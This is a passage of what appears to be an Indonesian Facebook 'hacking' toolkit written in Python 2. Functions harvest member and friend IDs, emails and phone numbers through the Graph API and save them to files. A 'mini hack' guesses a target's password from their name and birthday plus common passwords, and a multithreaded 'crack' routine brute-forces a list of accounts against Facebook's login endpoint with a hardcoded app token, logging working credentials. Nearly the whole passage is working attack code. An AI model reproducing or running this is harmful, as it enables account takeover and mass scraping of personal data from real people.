print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
